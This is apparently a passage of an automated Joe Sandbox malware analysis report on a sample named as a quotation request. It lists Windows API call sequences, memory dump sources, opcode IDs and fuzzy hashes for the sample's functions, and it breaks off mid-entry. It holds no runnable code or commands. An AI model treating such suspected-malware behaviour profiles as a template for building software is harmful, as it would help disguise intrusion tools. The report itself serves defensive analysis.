• Instruction Fuzzy Hash: D0314FB5D00249AFD700EFA9C881CEEBBF9EF49304B5480AAE415E7211D735DE45DBA0
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00F7D501
• Process32FirstW.KERNEL32(00000000,?), ref: 00F7D50F
• Process32NextW.KERNEL32(00000000,?), ref: 00F7D52F
• CloseHandle.KERNEL32(00000000), ref: 00F7D5DC
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 420147892-0
• Opcode ID: c4d14b0d659a5deebcd7978076ce80b8f7db73a464f8f0dad9ea4fa17923b731
• Instruction ID: e7d2c26d28d53cc935951a5421380c99d66a9fb2c2c2330c12620a0ab7703bda
• Opcode Fuzzy Hash: c4d14b0d659a5deebcd7978076ce80b8f7db73a464f8f0dad9ea4fa17923b731
• Instruction Fuzzy Hash: E6319E721083009FD300EF54CC81AAFBBF8EF99354F54492EF585821A1EB719984EBA3
APIs
  • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
• GetCursorPos.USER32(?), ref: 00FA9001
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F67711,?,?,?,?,?), ref: 00FA9016
• GetCursorPos.USER32(?), ref: 00FA905E
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F67711,?,?,?), ref: 00FA9094
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
• Opcode ID: a1380b067ed8ba4de1dce9cf738fa50b75772b4b3888f27fbf730c8b53afbd20
• Instruction ID: a8b79b33be88973f906bb5cc5a556f0761821df2b814f2dd605404785ac6ca4a
• Opcode Fuzzy Hash: a1380b067ed8ba4de1dce9cf738fa50b75772b4b3888f27fbf730c8b53afbd20
• Instruction Fuzzy Hash: 95219175A04018EFDB258FA5DC58EEA7BB9FF8A3A0F148065F5054B261C371A950FB60
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNEL32(?,00FACB68), ref: 00F7D2FB
                                                                                                                    • GetLastError.KERNEL32 ref: 00F7D30A
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F7D319
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00FACB68), ref: 00F7D376
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2267087916-0
                                                                                                                    • Opcode ID: 254589bb211a7f9b1fca9e0e22340404247f4100c53c66df89c4fa0373ee2b89
                                                                                                                    • Instruction ID: 0a9a066c29a04bf902dd0fc4b263ba2177dc8817bf182691894c985ca8c88657
                                                                                                                    • Opcode Fuzzy Hash: 254589bb211a7f9b1fca9e0e22340404247f4100c53c66df89c4fa0373ee2b89
                                                                                                                    • Instruction Fuzzy Hash: 4621A3709083019F8700DF24C8819AA77F4EE56368F908A1EF49DC32A1DB31D945EB93
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F71014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F7102A
                                                                                                                      • Part of subcall function 00F71014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F71036
                                                                                                                      • Part of subcall function 00F71014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F71045
                                                                                                                      • Part of subcall function 00F71014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F7104C
                                                                                                                      • Part of subcall function 00F71014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F71062
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F715BE
                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 00F715E1
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F71617
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00F7161E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1592001646-0
                                                                                                                    • Opcode ID: 171606e18652020d8cc5b30401fbfc06e304ae1e0bdb9e1889dda1ad50ce4dde
                                                                                                                    • Instruction ID: 66570cda82a23f0c892d4ccd74e44c48da2aa8decad7f3929cd7cedacad21305
                                                                                                                    • Opcode Fuzzy Hash: 171606e18652020d8cc5b30401fbfc06e304ae1e0bdb9e1889dda1ad50ce4dde
                                                                                                                    • Instruction Fuzzy Hash: 2B217C71E00108EFDB14DFA8D945BEEB7B8FF44354F18845AE445AB241E730AA09EB91
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 00FA280A
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FA2824
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FA2832
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00FA2840
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
• Opcode ID: b2d9c0d2deb558b8df32775522770d1d83e1bce85501721d6ea79eb65c49c2a0
• Instruction ID: a4645fdbf8ad14d83503c0e3c7e1d02254b307507c562c741527bd0aa42d0c71
• Opcode Fuzzy Hash: b2d9c0d2deb558b8df32775522770d1d83e1bce85501721d6ea79eb65c49c2a0
• Instruction Fuzzy Hash: 2321F171704110AFD7549B28CC44FAA7B95AF46324F188158F4268B6E2CB79FD82DBD0
APIs
  • Part of subcall function 00F78D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00F7790A,?,000000FF,?,00F78754,00000000,?,0000001C,?,?), ref: 00F78D8C
  • Part of subcall function 00F78D7D: lstrcpyW.KERNEL32(00000000,?,?,00F7790A,?,000000FF,?,00F78754,00000000,?,0000001C,?,?,00000000), ref: 00F78DB2
  • Part of subcall function 00F78D7D: lstrcmpiW.KERNEL32(00000000,?,00F7790A,?,000000FF,?,00F78754,00000000,?,0000001C,?,?), ref: 00F78DE3
• lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00F78754,00000000,?,0000001C,?,?,00000000), ref: 00F77923
• lstrcpyW.KERNEL32(00000000,?,?,00F78754,00000000,?,0000001C,?,?,00000000), ref: 00F77949
• lstrcmpiW.KERNEL32(00000002,cdecl,?,00F78754,00000000,?,0000001C,?,?,00000000), ref: 00F77984
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
• Opcode ID: 16358890b844532d92491e97dbf384aad51bb69abde748a9c4a1c9a02fbc8720
• Instruction ID: 4cab584048732b93306f46b58276fc5a5f29cfdf2a0606242bb039088e6c5dd4
• Opcode Fuzzy Hash: 16358890b844532d92491e97dbf384aad51bb69abde748a9c4a1c9a02fbc8720
• Instruction Fuzzy Hash: 5F11D63A211305ABCB156F34DC49E7B77B5FF99390B50802BF94AC7264EB319811E792
APIs
• GetWindowLongW.USER32(?,000000F0), ref: 00FA7D0B
• SetWindowLongW.USER32(00000000,000000F0,?), ref: 00FA7D2A
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00FA7D42
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F8B7AD,00000000), ref: 00FA7D6B
  • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Window$Long
• String ID:
• API String ID: 847901565-0
• Opcode ID: 65cbb7c61b6dab39de2221e41095859365b1cc973eeea394ccea4289ae564756
• Instruction ID: d903f649810646308e77af2a8d961de15221e55cdb3aa07766eb7ace73b6bd95
• Opcode Fuzzy Hash: 65cbb7c61b6dab39de2221e41095859365b1cc973eeea394ccea4289ae564756
• Instruction Fuzzy Hash: 2F11A5B2A047599FCB10AF29CC04E6A3BA5BF46370B154724F839DB2F0D7309950EB90
APIs
• SendMessageW.USER32(?,00001060,?,00000004), ref: 00FA56BB
• _wcslen.LIBCMT ref: 00FA56CD
• _wcslen.LIBCMT ref: 00FA56D8
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00FA5816
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: MessageSend_wcslen
• String ID:
• API String ID: 455545452-0
• Opcode ID: 9686825bc784dfd9819d8511c3139dcd3a8c683190679c1045f33eabb6953e1a
• Instruction ID: ca6fb28de6901172dc3c5ef4da150dc126ec30294f0cf6e9614192545280875c
• Opcode Fuzzy Hash: 9686825bc784dfd9819d8511c3139dcd3a8c683190679c1045f33eabb6953e1a
• Instruction Fuzzy Hash: 5611B1F6A0060896DF20DF618C85AEE77BCBF16B70F104026F915D6181EB74DA84EBA1
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7c9d808aa444063240477e641974362d9ba538f68445c3a083bf48e6badcfc93
• Instruction ID: 0090b7d765d7b87a5ee217da7eee1225bcca86d9e6ece99cde7923f3a325f41b
• Opcode Fuzzy Hash: 7c9d808aa444063240477e641974362d9ba538f68445c3a083bf48e6badcfc93
• Instruction Fuzzy Hash: 22014FF2A0561A7EF62116786CC1F677A2DEF413B8B340326FD31611D2DB649C847160
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00F71A47
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F71A59
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F71A6F
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F71A8A
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 34d62d75c09fea3622209528c037ead3031bee3914008355c44dac1cf209f942
• Instruction ID: 0802b0c18bd8d2fc9ccf32cda9a7c5438bd58c724df06b29770b737d985a619e
• Opcode Fuzzy Hash: 34d62d75c09fea3622209528c037ead3031bee3914008355c44dac1cf209f942
• Instruction Fuzzy Hash: 58110C7AD01219FFEB11DBA9CD85FADBB78FB08750F204092E604B7290D6716E50EB94
APIs
• GetCurrentThreadId.KERNEL32 ref: 00F7E1FD
• MessageBoxW.USER32(?,?,?,?), ref: 00F7E230
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F7E246
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F7E24D
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: a962e213e901ebbf5ec39e2881d9b25d92fdd27b7bacd51f740b6ff82d54e51d
• Instruction ID: b9da5eff80b57ad3ca0720c5ab6602c484c44ac80b9ab13f4495c2e589b4c1ab
• Opcode Fuzzy Hash: a962e213e901ebbf5ec39e2881d9b25d92fdd27b7bacd51f740b6ff82d54e51d
• Instruction Fuzzy Hash: 47112BB2E0425CBFC7019FA89C45A9F7FADAB45320F008257F818D7291D670CD00A7A1
APIs
• CreateThread.KERNEL32(00000000,?,00F3CFF9,00000000,00000004,00000000), ref: 00F3D218
• GetLastError.KERNEL32 ref: 00F3D224
• __dosmaperr.LIBCMT ref: 00F3D22B
• ResumeThread.KERNEL32(00000000), ref: 00F3D249
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Thread$CreateErrorLastResume__dosmaperr
• String ID:
• API String ID: 173952441-0
• Opcode ID: 5d83678ee5d747c94c4e95bf80c74f6d593348290aad5f3215c3d014faa1a02c
• Instruction ID: 90173a997b3dc12643d340cb41cba3c9d366a9023650074a13042030c5efecc3
• Opcode Fuzzy Hash: 5d83678ee5d747c94c4e95bf80c74f6d593348290aad5f3215c3d014faa1a02c
• Instruction Fuzzy Hash: B101D276805208BBDB216BA5EC09BAB7A69DF82731F100229F925921D0CF71C905E6A0
APIs
  • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
• GetClientRect.USER32(?,?), ref: 00FA9F31
• GetCursorPos.USER32(?), ref: 00FA9F3B
• ScreenToClient.USER32(?,?), ref: 00FA9F46
• DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00FA9F7A
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4127811313-0
                                                                                                                    • Opcode ID: 54af17434b699d0a27471f8f6fcbe240abba0fb52404f5c8b1a11c4328f8ab92
                                                                                                                    • Instruction ID: 46b0dbfb5859e49f49025a0984060d0d44095f7eacab093be9512733d6dee6c4
                                                                                                                    • Opcode Fuzzy Hash: 54af17434b699d0a27471f8f6fcbe240abba0fb52404f5c8b1a11c4328f8ab92
                                                                                                                    • Instruction Fuzzy Hash: EC1136B290415AAFDF10DF69DC859EE77B8FB46311F000461FA11E7141D374BA81EBA1
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F1604C
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00F16060
                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F1606A
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
• Opcode ID: db5b076c67e4dd3546d76e3999a0af83f14fa5dc7965dd30b792aaac2de22b3a
• Instruction ID: 5f0be766a10e3a9cdd354beab04df7f7d50b96ab4a0470fa082fec099b65aa96
• Opcode Fuzzy Hash: db5b076c67e4dd3546d76e3999a0af83f14fa5dc7965dd30b792aaac2de22b3a
• Instruction Fuzzy Hash: EC115BB2501548BFEF128FA49C44AEABBA9EF0D3A4F040215FA1492110D7329CA0FBA0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 00F33B56
  • Part of subcall function 00F33AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00F33AD2
  • Part of subcall function 00F33AA3: ___AdjustPointer.LIBCMT ref: 00F33AED
• _UnwindNestedFrames.LIBCMT ref: 00F33B6B
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00F33B7C
• CallCatchBlock.LIBVCRUNTIME ref: 00F33BA4
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• String ID:
• API String ID: 737400349-0
• Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
• Instruction ID: 9e5e932ea68d3dbcd64d8f127b9e5014d5130a7a4f7b72e24fa702bf94ee80dc
• Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
• Instruction Fuzzy Hash: 1F01E972500149BBDF129E95CC46EEB7B69EF98764F044014FE48A6121C73AE961EBA0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00F113C6,00000000,00000000,?,00F4301A,00F113C6,00000000,00000000,00000000,?,00F4328B,00000006,FlsSetValue), ref: 00F430A5
• GetLastError.KERNEL32(?,00F4301A,00F113C6,00000000,00000000,00000000,?,00F4328B,00000006,FlsSetValue,00FB2290,FlsSetValue,00000000,00000364,?,00F42E46), ref: 00F430B1
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F4301A,00F113C6,00000000,00000000,00000000,?,00F4328B,00000006,FlsSetValue,00FB2290,FlsSetValue,00000000), ref: 00F430BF
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: 5b75f349f812fcc0904b785cbd0d81854fecb4e1de48b6b80c0ac97069c64e91
• Instruction ID: 369c8e6412267f548f5d6a6854e56ac9b8c6386594470e2b02795e41b1c40a0a
• Opcode Fuzzy Hash: 5b75f349f812fcc0904b785cbd0d81854fecb4e1de48b6b80c0ac97069c64e91
• Instruction Fuzzy Hash: 5301DB76701226ABCB314B7D9C85A577FD8EF46B75B210720FD05E7140DB21D901E6E0
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00F7747F
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F77497
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F774AC
• RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00F774CA
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
• Opcode ID: 069b0e8b26421019b28113de3067771ad46e836e65227fc0c6ef9039c66e0ad6
• Instruction ID: c301dac4a56817474eb8258527eca452a53c9c112facde7c14326a08ff237ddf
• Opcode Fuzzy Hash: 069b0e8b26421019b28113de3067771ad46e836e65227fc0c6ef9039c66e0ad6
• Instruction Fuzzy Hash: 111161B5219315DBE720DF24DC09F927FFCEB04B04F10C56AAA5AD6191D7B0E904EB92
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F7ACD3,?,00008000), ref: 00F7B0C4
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F7ACD3,?,00008000), ref: 00F7B0E9
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F7ACD3,?,00008000), ref: 00F7B0F3
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F7ACD3,?,00008000), ref: 00F7B126
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: 876203871653c9f4c0fc3f4192745603528432d502f9cfb29aca35d1992ac5f6
• Instruction ID: 0a37c44b0ff2f815a3f5a830a66137c83d34d3b9480c924cf21c9cd377656e5c
• Opcode Fuzzy Hash: 876203871653c9f4c0fc3f4192745603528432d502f9cfb29aca35d1992ac5f6
• Instruction Fuzzy Hash: B6118B71E0152CE7CF00AFE4E9687EEBB78FF0A311F108086D945B2181CB704651EB92
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F72DC5
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00F72DD6
• GetCurrentThreadId.KERNEL32 ref: 00F72DDD
• AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F72DE4
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: ef3f3c3d47b10b5ae82e8a1df5f961be80adcbc7d30f7c05385c1fd7dfc30202
• Instruction ID: 4918c081794212979daeb782d06a014d2ea8e42df73ae2429b7ab961a53484ec
• Opcode Fuzzy Hash: ef3f3c3d47b10b5ae82e8a1df5f961be80adcbc7d30f7c05385c1fd7dfc30202
• Instruction Fuzzy Hash: 04E06DB26012287AD7205B639C0DFEB3E6CEB43BA1F004016B109D11809AA08840E6F1
APIs
  • Part of subcall function 00F29639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F29693
  • Part of subcall function 00F29639: SelectObject.GDI32(?,00000000), ref: 00F296A2
  • Part of subcall function 00F29639: BeginPath.GDI32(?), ref: 00F296B9
  • Part of subcall function 00F29639: SelectObject.GDI32(?,00000000), ref: 00F296E2
• MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00FA8887
• LineTo.GDI32(?,?,?), ref: 00FA8894
• EndPath.GDI32(?), ref: 00FA88A4
• StrokePath.GDI32(?), ref: 00FA88B2
Similarity
• API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
• String ID:
• API String ID: 1539411459-0
• Opcode ID: 15f98967df03a51305d91d880b10f9e5f0dedce26448059f81b39f6e857d7e65
• Instruction ID: 7ddecf090f3625819705af2b246590aea2b0224a3f149cd1206c815c4b4664e0
